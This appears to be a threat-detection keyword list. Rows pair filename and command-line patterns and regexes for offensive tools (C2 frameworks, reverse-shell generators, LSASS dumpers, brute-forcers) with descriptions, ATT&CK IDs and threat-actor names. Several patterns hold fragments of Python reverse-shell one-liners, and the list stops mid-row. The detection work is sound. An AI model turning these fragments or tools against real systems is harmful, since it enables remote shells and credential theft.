scshell*",".{0,1000}python\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*python st.py*",".{0,1000}python\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python tinar.py*",".{0,1000}python\stinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*python* -c 'import os,pty,socket*socket.socket()*s.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\sos,pty,socket.{0,1000}socket\.socket\(\).{0,1000}s\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python* -c 'import socket,subprocess,os;*socket.socket(socket.AF_INET,socket.SOCK_STREAM)*.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\ssocket,subprocess,os\;.{0,1000}socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\).{0,1000}\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python* pachine.py*",".{0,1000}python.{0,1000}\spachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation 
for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "*python*charlotte.py*",".{0,1000}python.{0,1000}charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*python*http://*:6970/ConfigFileCacheList.txt*",".{0,1000}python.{0,1000}http\:\/\/.{0,1000}\:6970\/ConfigFileCacheList\.txt.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*'http://*SEP*:6970/*.cnf.xml*",".{0,1000}python.{0,1000}\'http\:\/\/.{0,1000}SEP.{0,1000}\:6970\/.{0,1000}\.cnf\.xml.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*https://*:8443/cucm-uds/users?name=*",".{0,1000}python.{0,1000}https\:\/\/.{0,1000}\:8443\/cucm\-uds\/users\?name\=.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - 
TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python_modules/keyboard.zip*",".{0,1000}python_modules\/keyboard\.zip.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*python2??/generator.py*",".{0,1000}python2\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C 
version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python2??/PyLoader.py*",".{0,1000}python2\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3 ./exp.py --url http://*",".{0,1000}python3\s\.\/exp\.py\s\-\-url\shttp\:\/\/.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","393","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" "*python3 dump-restore.py *.dmp --type restore*",".{0,1000}python3\sdump\-restore\.py\s.{0,1000}\.dmp\s\-\-type\srestore.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*python3 dump-restore.py*",".{0,1000}python3\sdump\-restore\.py.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*python3 fee.py*",".{0,1000}python3\sfee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*python3 gcr.py*",".{0,1000}python3\sgcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*python3 GetHash.py NtCreateFile*",".{0,1000}python3\sGetHash\.py\sNtCreateFile.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*python3 -m orbitaldump *",".{0,1000}python3\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*python3 -m pwncat -lp*",".{0,1000}python3\s\-m\spwncat\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python3 -m pwncat -m windows -lp*",".{0,1000}python3\s\-m\spwncat\s\-m\swindows\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*python3 -m S3Scanner*",".{0,1000}python3\s\-m\sS3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*python3 Ninja.py*",".{0,1000}python3\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*python3 ntlmv1.py *",".{0,1000}python3\sntlmv1\.py\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*python3 pacu.py*",".{0,1000}python3\spacu\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*python3 rsf.py*",".{0,1000}python3\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - 
TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*python3 scshell*",".{0,1000}python3\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*python3 sitadel*",".{0,1000}python3\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*python3 slip.py*",".{0,1000}python3\sslip\.py.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive 
files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*python3 st client wss://*",".{0,1000}python3\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python3 st.py*",".{0,1000}python3\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*python3*.exe .\nxc*",".{0,1000}python3.{0,1000}\.exe\s\.\\nxc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*python3??/generator.py*",".{0,1000}python3\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3??/PyLoader.py*",".{0,1000}python3\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3_reverse_tcp.py*",".{0,1000}python3_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*python3_reverse_tcp_v2.py*",".{0,1000}python3_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*pywerview.py*",".{0,1000}pywerview\.py.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*pywhisker.py -*",".{0,1000}pywhisker\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pywhisker.py*",".{0,1000}pywhisker\.py.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - 
TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*pywhisker-main*",".{0,1000}pywhisker\-main.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*pywsus.py*",".{0,1000}pywsus\.py.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*",".{0,1000}Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa*",".{0,1000}Q2s1UFgwbFFYMGhQVTFRZ1BTQW5aMjl2WjJ4bFkyaHliMjFsWVhWMGJ5NXpaWEoyWldseVl5NWpiMjBuQ2t4SVQxTlVJRDBnSnpFNU1pNHhOamd1TVM0ekp3cE1VRTlTVkNBOUlEUTBNd3BVU1UxRlgxTk1SVVZRSUQwZ01UQUtDbFJGVFZCZlVFRlVTQ0E5SUhSbGJYQm1hV3hsTG1kbGRIUmxiWEJrYVhJb0tRcFNSVWRmVUVGVVNDQTlJSElpVTI5bWRIZGhjbVZjVFdsa.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - 